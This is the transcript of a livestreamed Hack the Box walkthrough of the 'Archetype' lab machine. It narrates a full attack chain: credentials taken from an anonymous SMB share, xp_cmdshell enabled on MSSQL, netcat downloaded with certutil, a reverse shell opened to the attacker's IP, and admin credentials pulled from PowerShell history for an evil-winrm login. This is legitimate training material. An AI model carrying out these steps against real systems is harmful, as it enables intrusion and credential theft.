Hello everybody and welcome. This is HackerFrogs and I am the Shy Hat. Alright, so everybody, what we're going to be doing today is we're going to be doing Hack the Box starting point. We're on tier 2 and we're currently on the Archetype box. If you wanted to take a look at previous streams that we've done covering Hack the Box. We have a series of them over on the YouTube page. I can leave that link in the chat for everybody to take a look at if you like. I'd like to say hello to our good friend Notes by Nisha, who's here to hack the box, and that's what we're going to be doing today. In particular, if you have not used Hack the Box before, I suggest going back to one of the earlier streams. We've got this one over here talking about the starting point tier 0 machines. If you want to take a look at that, go ahead and check out the link that I provided in the chat. But we're going to be jumping right into it today because this could take quite a while. So let's move over to the Hack the Box website. So over at Hack the Box, you want to make sure that you're at tier 2 over here and you're at the starting point webpage. I'll provide that link in the chat as well. And what you want to do is make sure that you're at tier 2 if you want to follow along with us, and then go down to the Archetype challenge and click on the spawn machine button over here if you have not already done so. I'm a little bit paranoid about the time that it takes to spin up these virtual machines, so I did so ahead of time. So this is the IP address for my target machine. When your machine is spawned, it'll probably be a different IP address, but that is perfectly fine. Just click on the IP address over here, and it's going to copy the IP address to your clipboard. All right, so then you can paste it into your command line terminal and start testing. So the first thing we like to do when we do testing on a new box is we like to ping out to it. So it's going to be ping and then C4-C4 and then the IP address. And this is going to let us know whether or not we have connectivity to the box. Of course, in order to access the Hack the Box starting point network, you're going to need to have an OpenVPN connection over here. So when your OpenVPN connection is running, you're going to see output that looks a lot like this. So after you are connected, you can spin up your target virtual machine and away you go. All right, so we're going to ping out to the machine, and then we're going to receive ping packets back, and then we're going to get a result over here: 4 packets transmitted, 4 received, 0% packet loss. That's what we like to see. All right, so after we've confirmed that we have connectivity to the machine, we can run our first Nmap scan. So Nmap is going to let us know what ports are open and available for networking on this particular server. So this is how I like to run my Nmap scans. So it's -p-, which is going to scan all of the ports, and I like to put it on very verbose, which is -vv, and that's going to let us see output from the scan immediately and not when the scan is completely done. And the last flag over here is -t4, which is going to run Nmap at the second to fastest speed available. That's fast enough to get reliable results relatively quickly, but still not be super fast and get some false positives on our scan. So we run that command, and the scan immediately finds a bunch of open ports. So these 3 ports over here, 139, 135, and 445, are typically associated with the SMB protocol. SMB, which is server message block, is the file sharing protocol used by Windows machines. So if we didn't know that we were dealing with a Windows machine before, we can also look at the results of the ping over here, and in the results of the ping, we saw that our time to live on our ping packets have 127 as a value, and that typically indicates that what the server that we're communicating with is a Windows machine as opposed to a Linux one. So you usually see 127 or 128 for a Windows machine and something like 64 or 65 for a Linux machine. So that's one of the little tricks you can employ to get a feel for what kind of server that you're dealing with. Okay, so we see that after we see that we have these SMB open ports we can certainly try to enumerate on these ports with another scan. All right, so we can go over to our. So while this scan is finishing up, it might take a little while. We can go over to another tab, and we can start doing an Nmap scan and check if we have any open shares available on SMB. Okay, so this is another Nmap scan, and that's going to be Nmap and then SB, and then we're going to specify the ports. It's going to be 130, 139, and 135, and 445. Those are the SMB related ports, and we're going to give it a T4 for that speed, and then we're going to give Nmap a specific script to run. So this is going to be script, and then the script is going to be called SMB enum-shares. And then after that, we provide the IP address. So what this script is going to do is it's going to try to see if there are any publicly available shares available on the server via SMB. So we're going to run this, and Nmap is going to enumerate these specific ports and try to see if there are any open SMB file shares that we can access. So in the meantime, let's go back to our initial Nmap scan and see if it's found anything additional. It doesn't look like it has so far, but there are other ports open on the system, I'm pretty sure. So we'll check back on this a little bit later. All right, so I always find the beginning stages of enumerating a machine to be the most exciting, because there could be anything available on this box. So let's see. So the Nmap scan has come back, and we see here that it's identified the open ports over here, as well as the version over here with these ports, and it's also finished enumerating shares, which we specified in the script. So it says account used guest. Okay, so we see that there is the admin share over here. We have the C share. We have the IPC share. So these are admin shares. So we would need admin access in order to access them. We can tell because they have the $sign appended to the name over here. And as well, we have one publicly open share, which is called backups. Okay, so now that we know that that we have an open share on this SMB SMB file share, we can definitely try to enter that share using the SMB client tool and try to see if there are any files inside that we can nab. All right, so I'm going to clear this off, and then I'm going to use the SMB client. So SMB client is a tool that we can use to interact with the SMB protocol and try to interact with file shares on the system. So this is the command over here. It's going to be SMB client and then // and then the IP address and then another / and then the name of the file share you want to access. So the -N flag over here is going to specify that we're trying to log in we're trying to access the file share without logging in as a specific user. And that's what the -N flag is there for. So according to the script, we were able to access this file share without logging in, so that shouldn't be a problem. So after we've used the SMB client tool, that we've now entered the backups file share. So I think pwd command works. Most of the command line, the commands inside of SMB are similar to ones that are found in Linux and Windows. So stuff like dir or ls are going to work. I think pwd works as well. So it says current directory is backups. All right. So let's see if ls works. So ls works, and we see that there is one file in here, and it's called prod.dtsconfig. So dtsconfig, I'm not sure what a dtsconfig file might be. We could try asking ChatGPT what this particular file is, but nonetheless, we're going to download it. So we're going to use the get command in order to download the file, and I'm pretty sure you can use tab autocomplete to finish off names of files. So we're going to get that, and we have downloaded it. And I don't think there's anything else here. We certainly can't move anywhere in the file system. So we can exit out of the SMB client tool with the exit command, and then we can take a look at what is in this dtsconfig file. So let's ask ChatGPT what dtsconfig is. So over here, what is the Okay, so it's a configuration file used in SQL Server Integration Services. So it's a configuration file for the database. So this is a pretty big thing to download, because we could potentially get user account information from this file. So let's go back. So prod.dts.config. Let's cat it out. So we see here that that we have a password. So we've got a password and a username over here. So the password is this right here, megacorp user123, and the user ID over here is on the Archetype system, and it's called SQL_SVC. So I would assume this means SQL service. All right, so that's great. That means we could potentially log into a database using this this set of credentials. All right, so while we're thinking about that, let's go back to the Nmap scan over here. It's discovered a few new open ports. So it's discovered some RPC ports. I think it's called RPC. So these are ports in the 40,000 range. All right, so we haven't quite finished scanning this, so we're just going to wait a little bit. But let's figure out where the if this server is running a database, it's probably running it on this port right here, 1433. So we can ask for example, we could ask ChatGPT. In the case of Windows servers, which networking port would the database be available on? So it says on Windows servers, hold on, the SQL Server database is typically port 1433. Okay, so 1433 is open, and we found some database credentials. So we're going to have to assume that that we can use the we can log into the SQL database on this port right here. All right, and it's and because this is a default port, we could probably use a program or some sort of tool to connect to it. Okay, so so we're just going to keep on letting this run, but in the meantime, we can try to access the SQL Server on the Windows My MS SQL Server using the MySQL Client tool, which is part of the Impacket package. So Impacket is a bunch of security tools used for testing Windows Windows environment. So in order to access it, we would use Python. So it's Python and this command right over here. It's really long. Whoops, that's not it. Let me grab my my IP address again. Hold on. So this is a very specific tool, which is part of Impacket, and it is installed by default on Kali Linux machines, and it's going to be the default install location is going to be user share doc python 3 impacket examples mysql client.py. So as part of running this tool, you have to supply a server. So first you have to supply a username, which in this case is Archetype / SQL server, SQL service rather, and then you have to use a colon to separate out the password, and then supply the password, which is megacorp123, and then and then the IP address where the server is located, and then you're going to have to give the Windows auth flag. And that's how you log in using the mysqlclient.py file. So I'm going to copy this command and I'm going to paste it in the chat just in case you wanted to use something like this. Remember that you're going to have to substitute out the IP address in the command for your own instance. All right, so we run the command and we are in. So I'll just put on my favorite, my Hollywood hacker voice. We're in. All right, cool. So we are in MS SQL Server right now. So the first thing we want to do is we want to figure out some information about this SQL Server. So before that, let's just do a quick checkup on the scan over here. So it's nearly done. But in the meantime, we can use MS SQL Server and try to enumerate some information about the database. So the first thing we want to do is we want to figure out what kind of permissions our current user has. So in order to do that, we're going to give the following command. It's going to be select and then current _ user as current user. And I'll supply all of these commands in the chat just in case you wanted to use them. And it says that the current user is DBO. DBO? That's interesting. Okay, so the output indicates that we are the DBO user, and the DBO user typically has significant permissions on both the database and the server level. So we're going to check our database and server permissions now with the following command. So it's going to be exec and then sp help srv service role member. Okay, so I'm going to copy this and provide it in chat as well. I hope I haven't misspelled anything. Okay, so we see a bunch of output right here. So the output indicates that among the output, we see that the current user is a sysadmin. And so that means we should be able to use the xp command shell function for arbitrary command execution. So we see here that this is the username right here. And it says that we are a sysadmin. So we can check if we can use the xp command shell function, which is typically one way that we can get remote code execution on a Windows server running MS SQL Server. Okay, so the command is going to be exec sp configure show advanced options and then 1. So this is going to show a bunch of advanced options on the server. Okay, so it says configuration option show advanced options has changed from 0 to 1. So initially we can't show the advanced options. So this command over here is going to enable showing advanced options. So in order to confirm this, we have to use the reconfigure statement. So it's going to be reconfigure, and then we have to end all of our statements with a semicolon. And after that, we can take a look at whether or not XP command shell is enabled. So this is going to be exec sp configure, and we're looking for XP command shell. Okay. And let's run that. So it says here that XP command shell, this function, is either turned off or on, and right now the configuration value is 0, which means it is not enabled. So we can enable it by using the following command. So it's going to be exec sp configure, and then xp underscore command shell, and then we want to set it to 1, which is enabled. Okay, so after we run this command, we enable. This is us trying to enable XP command shell, and it says that it has been changed from 0 to 1. We have to run the reconfigure statement to install. So we're going to run that reconfigure, and after we run that, we should be able to run the XP command shell function and gain remote code execution on the system. Okay, so we can run example. So for example, if we wanted to run XP command shell and run a command, we could do this right here. So exec XP command shell, and then we run the command who am I, and then we have to end the statement with a semicolon. And we see here that the output is Archetype / SQL _ SVC for service, and that is the name of our user. Okay, so this proves that we have remote code execution on the system. So we can set up a reverse shell on the system, but first we have to follow a couple of steps. We need to upload netcat to the system in order to run the command to get us the reverse shell. So back on the Kali system, we're going to need to navigate to a correct directory and then start a web server. So what we're going to do is we're going to force the server to download files from our Kali attacker machine. But first we have to set that up. So what we're going to do is we're going to go back to our machine over here. So the Nmap scan has now completed. So we see that the following ports are open. So we see all of this over here. We also see the MS SQL server over here on port 1433, and we also see this service right here, which is Windows Remote Management, which is running on port 5985. So this is going to be important for later on in the exercise. But for right now, we just need to know that this Windows Remote Management service is open on the system. We're going to be taking advantage of this later, but for now we just need to keep this in the back of our minds. Okay, so right now I'm going to open up a new tab, and this is just going to be for our hold on. I'm going to rename this, and I'm going to call this our web server. So we're gonna serve some files on our Kali machine, but first we have to go to the right directory. So I'm going to go to cd/user/share/Windows resources binaries. Okay, so these are this is a collection of Windows binaries that we can upload to Windows targets. And once here, you'll see that we have a bunch of different common Windows binaries that we can upload to our Windows targets, including this one right here called nc.exe, which is netcat. So we're going to what we're going to do is we're going to run a web server from this directory right over here on our Kali machine. And we can do so with the following command: python -m http server 80. So this is going to run a web server on port 80 from our machine. So we run this, and if you wanted to run this command yourself, it is available in chat. If you have any questions about any of the commands that we're running, or any other comments or questions in general, go ahead and type them in chat, and I'll try to address them as soon as possible. So now that we've run the Python web server over here, we are now serving files from our attacking machine on port 80. So what we need to do for this next step is we need to figure out what our IP address is. That is the attacker machine IP address, and we can do so with the following command. It's going to be ifconfig. So ifconfig is going to let us know about our networking information, and the interfaces. We've got 3 different interfaces over here. We're only interested in the ton0 interface because this is the one that is connected to Hack the Box. So on the ton0 interface, our internet address is 10.10. This over here. So it's going to be different for your machine, but we need to take note of this. So I'm going to copy this, and next what we're going to do is we're going to have the Windows server download the netcat binary from our Kali machine to upload it to the Windows server where we're going to be using it next. Okay, so now that we have our web server set up, okay, we can download netcat for Windows from the MS SQL service. So we're going to go back to our machine where we are logged into. We're going to go back to our tab where we're logged into the MS SQL service, and then we're going to issue the following command. So this is going to be a bit of a long one. So it's exec xp command shell, and then we're going to use the certutil program on Windows. Certutil, and then -URL cache, and then split, and then -f, and then we're going to provide a web address. So it's HTTP, and then our Kali IP address. So we're going to paste that in. So this is our Kali IP address, and then we're going to download nc.exe, which is netcat, and then we're going to copy it over to a writable directory. So assuming that we are the SQL _service _svc user, we can use that user's downloads directory to store a file, which means that we're going to store the file at c/users /SQL _svc /downloads /nc.exe, and then we have to close out the quote, and then we have to provide a semicolon to end the statement. All right, so this is a long command. I'm going to copy it over to the chat for everybody to use. You just need to copy out the IP address for your own Kali machine's IP address. Okay, so after we run this, it's going to say certutil URL cache command completed successfully. All right, so one other way we can tell that the command ran successfully is that we can go over to our web server over here, and we're going to see that there was a that the nc.exe file was accessed from our target IP address over here. So we've successfully uploaded the netcat binary up to the Windows server. Okay, so that being done, we can open up our reverse shell. We can have the Windows server connect to our reverse shell. So first we need to set that up by doing the following. So we're going to go over to another tab called reverse. I just named this one reverse shell. What we're going to do is we're going to set up our netcat listener over here. So it's netcat and then -nlvp, and I like to run it on port 443 because 443 is associated with HTTPS, and that is usually a port that is not blocked by firewalls, and that's why I like to set it up on that port. So this is a netcat listener, and it's listening for an incoming connection from the Windows server in order to open up our reverse shell. Okay, so on MS SQL, we're going to have to run this command over here. So back at MS SQL server, we're going to run the following command. It's going to be exec xp command shell and then c/user/sql svc for SQL service, and then downloads, and then nc.exe, we're running netcat, and then we're going to execute cmd.exe, the command prompt, at our Kali IP. So the Kali IP is it should be up here, just in case you don't have it. Whoops. This is why. Okay. So emd.exe, and then the Kali IP address, which is this right here. I'm going to copy that. Whoops. So, well, I mean, I don't need to copy it. It's just 10.10.14.92. Okay. And then 443, and then we need to close out the quote and then give the semicolon. All right, so I'm going to paste this in the chat for everybody to use if you like. Okay, but the only thing to note that if you want to use that command, you have to swap out the IP address with your own Kali Linux IP address or whatever attack machine you're using. So we run that command, and then it's going to hang. So we know that that this command is in process because we don't get any output from the MS SQL service. But if we go to the reverse shell, our reverse shell listener has received a connection. So we got that connection from unknown, and this is the IP address of the target machine, and now we have a reverse shell on the target, and we can say we're in. Okay, so I'm gonna give this a little. Is this a hacking over here? This is a hacking. Anytime you're typing on the command line interface, you're doing a hacking. All right, so now that we're here, what do? We're going to want to use WinPs to enumerate the system for privilege escalation methods. So now that we're here, we can certainly get the user flag for the system. We're in. Notes by Nisha. Thank you very much. We are in. Okay. So we can go over to the C users, and we can go over to let's see, SQL SVC, and then we can go to their desktop directory. Desktop. So typically in Hack the Box exercises on Windows machines, you're going to find the user flag on a user's desktop directory. And in this case, that is also the case. We see that over here and the user's SQL_SVC desktop directory, we see user.txt. We're going to type that out with the type command. So when we're reading files from a Linux machine, we use the cat command, but on the Windows machine, we use the type command. So this is the user flag right here. We're gonna copy this and we're gonna leave it somewhere, maybe on our notepad somewhere, because we're gonna need to use this when we're completing the questions. So we're gonna take note of that. And next we're gonna try to upload WinPs to enumerate the system. So in order to do that, we're going to need to download WinPs first. So let's see. So on our Kali machine, we're going to have to use the wget command. So over at, not this one, but this one, okay. So we're going to use the wget command and we're going to download WinPs for Windows 64-bit systems. So this is the path that leads to WinPs. So WinPs is a commonly used Windows enumeration security testing tool, and it shows you if there are any security flaws on your Windows system. I'm going to leave the command that downloads this binary in the chat in case you need to use it. So after it's downloaded, now we can upload it to our target using the same method that we did to upload the netcat command, the netcat binary rather. So we're going to need to move this over to our Windows binaries folder, and we're going to move it into, let's see which directory it is. Hold on. So let's move it to /user/share/Windows resources/binaries. And we're going to save it as WinPs x64.exe. And so because we're moving it into this this root owned directory over here, we're going to have to run it as sudo. So we're going to run this as sudo, and I'll provide this this command for anybody who wants to use it in chat, just so you don't need to type it all out yourself. Okay, so when we run the command, we're going to need to give the password for Kali. If it's default, then it's going to be Kali. And after that, this file is going to be available for download from our Windows machine. Okay, so back at our reverse shell over here, we're going to use the certutil program again. So it's going to be certutil, and then it's going to be URL cache -split-f HTTP, and then the Kali IP address. And our Kali IP address, let's grab that really quick. So it's this one. Copy that. Well, we don't need 443 there, but it's our Kali address, and then we're going to do /winps x64.exe, and then we're going to save it into users/SQL_service/downloads/winps x64.exe. Okay, so this is the command. I'll, as usual, I'll leave this in the chat just in case you want to use it. Okay, it says the command completed successfully. So let's take a look at this, if we downloaded it successfully or not. Oh, this is the wrong directory. We're going to want to go out to our downloads directory. Okay, so here WinP's x64.exe is available. All right, so let's run that command. So WinP's x64.exe. So this is going to run a bunch of tests on the Windows server to see if there are any security vulnerabilities. So this is going to go by really fast, and we're probably not going to be able to read all this output as it's all flying by. But the interesting thing about WinP's is that it color codes the different information that is output by the program, and we can see at the top, and there's a lot to scroll through. Hold on, let me just scroll bar this. Okay, so the interesting thing is that there's color output for this program, and that if you see something in red, that indicates a special privilege over an object or something that is misconfigured. And these are usually the methods through which we can do privilege escalation. So this is the color of output that we want to keep an eye out for. So let's take a look at some of the stuff we see here. So we see here that we see the basic system information about this server over here. So this is a virtual machine. This is something we need to. This is an interesting finding. Okay, and then it tells us about a bunch of different CVEs that this system may be vulnerable to. So the interesting thing, the key word there being maybe. So a lot of these tend to be false positives, but if we wanted to, we could go through each one of these CVEs and see if there were exploits that we could use to try to gain escalated privileges on the system. So here we see user environment variables, last shutdown times, a bunch of different settings. So AV information, no AV was detected. So this is one of the reasons why we were able to do all of our malicious things. There was no AV antivirus detected. So if there were running antivirus on the system, then it would have probably prevented us from uploading files, especially malicious files. Well, files that could be used for malicious purposes like netcat or winps.exe for that matter. So what else do we see? So the thing is that when you see the output from WinPs, there's a lot of information here, and it can be very overwhelming for people who are new to using this this program. But after a while, you get used to seeing certain patterns in the output. In particular, we see this one over here, current token privileges, which are privileges associated with the current user, and this one says SE impersonate privilege. So SE impersonate privilege means that we could this system might be vulnerable to what is called a potato exploit, which lets you elevate your privileges by using the impersonate privilege on the system. But we're not actually looking for that to get elevated privileges on the system. We'll talk about what we're going to be doing to elevate our privileges in just a little bit. But just keep in mind that whenever we get onto a new Windows system that we want to enumerate, we can use this particular program, WinPeas, in order to get output about what privilege escalation techniques we could potentially use. So we're going to go down to the bottom of the output, and what we're going to talk about is something different. So we're going to talk about the privileges that were found by WinPeas, and we can do that by running the following command, whoami/priv. And we see that the impersonate privilege is over here, which does impersonate a client after authentication. So this lets users run commands as a different user. So you can see how that can be potentially used for abuse. But what we're actually going to do to elevate our privileges is we're going to enumerate the system for command line history, and in particular we're going to enumerate the system for PowerShell command line history. So what we can do is we can try to locate the PowerShell command shell history for our current user. So it's usually located in the following location. So there are two types of command line history we could try to search for. We could try to search for the regular command line history, which is the command prompt, or we could try to search for the PowerShell command line history. And so we can search for the PowerShell command line history in the following location. So it's going to be C. We're going to try to go into this directory. Actually, we're going to try to read this. So it's going to be type and then C/users and then the name of the current user. Wait, hold on. /users. And then the name of the current user, which is SQL_SVC. And then it's going to be in the app data directory, and then in the roaming directory, and then in the Microsoft directory, and then in the Windows directory, PowerShell, PS readline, PS readline, and then it's going to be the console host _history.txt. So this is where the history of all commands given in PowerShell are stored. Okay, so we run that. And just in case you want to run this command yourself, I will provide it in the chat for everybody. So we see here in the output that there is a history over here, and it is net exec use t. Okay, so this is going to run a command on this particular directory over here as the user administrator using the password megacorp admin. All right, so this is really important because there are credentials in this file over here, which we could use to elevate our privileges. So this is the administrator user's credentials over here. So what we can do is we can simply log into the system as the admin user, and at that point we have admin privileges over the system, and we're going to be able to finish our exercise. All right, so we're going to log out of here, and then we're going to use the Windows Remote Management service in order to log in. So we're going to exit out of here, and we're no longer logged in, but we know that the administrator user's password is this right here. So remember way back when we did our scan, we found this port right here open, which is WSMan. So this is management, and what this is the WinRM service. So Windows Remote Management is a service that you can only log into as the administrator user, and it runs on this port right here, 5985. So in order to log into Windows Remote Management, we're going to use a tool called Evil WinRM, which is installed on Kali Linux by default. So we're going to run it from our Kali machine, and the syntax we use to run that command is this: evil winrm. That's not the password. And we need to get the IP address for this vulnerable system. Hold on, let's grab it right here. And we plug in the IP address, and then we plug in the password, and we know that the password is megacorp admin, which is spelled just like this. All right, so we're going to use the Evil WinRM tool to log into the WinRM service on this server right here as the administrator user, using the password, this password right here. So I'm going to copy this into chat for anybody who wants to use it. Okay, so when we run the command, we will be logged in as the administrator user. Okay, so this is taking a little bit. Paradox Gaming says, oh, to you as well. Hope you're having a good time, and I hope you're having fun watching us complete this box over on Hack the Box. Okay, so we're now logged in as the administrator. So if we were to ask who am I, it would say we're the administrator. The response seems to be a little slower than usual. So we are the Archetype systems administrator over here. Paradox Gaming says Oracle VirtualBox or VMware VirtualBox. This is so VMware. We're not using VMware. We're using VirtualBox from Oracle. So VMware, I'm not sure what the company is that does VMware. But we're using Oracle VirtualBox for our Kali Linux machine right now. I know some people have some strong feelings about whether or not to use VirtualBox or VMware. But now that we're the administrator user, we can get the final flag that we need to do to complete the exercise, and that's going to be at the administrator user's desktop. So we're going to do cd .. and then into the desktop. So we see here that the root.txt flag is here. We can type that out. Root.txt, and this is the value right here. Okay, so we can copy this, and we're going to keep it somewhere because we're going to be using it to answer the questions in just a little bit. Okay, so everybody, what did we do on this system? So the first thing we did was we ran an initial nmap scan on the system, and we were able to see that there was the SMB service available on the system. So from there, we were able to scan the SMB service, and we saw that there was an open file share available on the service. So after that, we logged in via SMB and we downloaded the configuration file. And on the configuration file was credentials for the MS SQL server. The MS SQL server service, and so we were able to log in basically as an admin user on the MS SQL service, which we did over here. From there, because we were running as an admin user, we were able to turn on the XP command shell function that is common to the MS SQL service database software, which lets us run commands from the database on the underlying server, which let us get to remote command execution on the target. And then from there, we were able to find some credentials. We were able to find some credentials in the command line history over here, and that gave us administrator credentials. And then we used the WinRM service to log in as the administrator, and we were able to compromise the system that way. All right. So the last thing we need to do is we need to go over to the Hack the Box webpage, and we need to answer all the questions associated with this machine. So let's do that. So the first question is, what TCP port is hosting a database server? So that is going to be 1433. 1433 is the port for MS SQL Server. Okay, question 2. What is the name of the non-administrative share available over SMB? So in order to compromise this, in order to get the SQL database credentials, we logged into we accessed the backups file share. All right, we're going to have to wait for this to time out before we can submit this answer again. All right, so to anybody who is following along with our walkthrough over here, please type I'm following in chat with some smiley faces. Suvik Day asks, you have LinkedIn? Yes, we do have LinkedIn, and we're currently streaming to LinkedIn as well. If you were to, so Suvik Day, let's see. Why don't you, if you want me to add you on LinkedIn, why don't you paste in your LinkedIn link in the chat, and then I'll add you after the stream is over. Where do I follow you? Well, I guess I could provide my own LinkedIn over here. Let me see if I can grab it real quick. So this is my LinkedIn link right here if you want to follow me, and you can watch you can also watch the stream there if you wanted to. Okay, so the next question is, what is the password identified in the file on the SMB share? Okay, so the file, the password on the SMB share, let me grab that real quick. That is this one right here. I'll paste it in chat for anybody who wants to follow along. It's this right here. Meanwhile, the next question is, what script from the InPacket collection can be used in order to establish an authenticated connection to the Microsoft SQL Server? All right, so if you remember, we used the MS SQL, hold on, let me resubmit that answer. We used the MS SQL client.py file, so it's going to be MS SQL client.py. Submit that as the answer. Okay, next question is, what extended stored procedure of Microsoft SQL Server can be used in order to spawn a Windows command shell? Okay, so if you remember, the name of the function that we abused in order to get remote code execution on the system was XP command shell. And that is the answer for the question. So the next question is, what script can be used in order to search possible paths to escalate privileges on Windows hosts? So if you remember, we used a particular program in order to scan the system for privilege escalation methods, and that program was called WinKeys. And I'm pretty sure you can just use the lowercase version of this as the answer. And it does accept that, great. Okay, so next, the question is, what file contains the administrator's password? So if you remember, the file that we accessed to get the administration credentials was console_host_history.txt. Okay, so the last two questions we need to do is we need to submit both the user flag and then the root flag. So if you're following along, this was the user flag over here. And this right here was the root flag. And with that, we are finished. We have been informed that Archetype has been pwned. Civic Day says, I sent you the request. Your content is very good. Well, thank you very much, Civic Day. I really appreciate that. All right, so congratulations. And then we need to click OK, and then the challenge is over. All right, so everybody, so that is the end of what we're going to be doing today. But next time, next Friday, we're going to be covering this box right over here called Oopsie, and we're going to be walking through that machine as well. So please look forward to that. That's going to be next Friday. But if you want to get more HackerFrogs content, we have a subreddit rather, over here, over at reddit.com/r/HackerFrogs, and we have all sorts of posts over here talking about how to get into cybersecurity, and we also have our streaming schedule over here. So this is Friday's streaming schedule, and it is June 21st. We're doing free hacking, and then myself, Civic Day from India, I try it today. Oh, well, good luck, and nice to meet you. All right, so this is HackerFrogs, and we're going to be doing a workshop on Python programming next week. So we just finished our Python programming basics number 5. Next week we're going to be doing number 6 and number 7, and that's going to be on Monday, not Monday, June 17th, but Monday, June 24th. Okay? And so that's going to be the next HackerFrogs workshop. But until then, everybody, I hope you all have a great Friday and a great weekend, and we will see you next time. Have a great night, and talk to you later.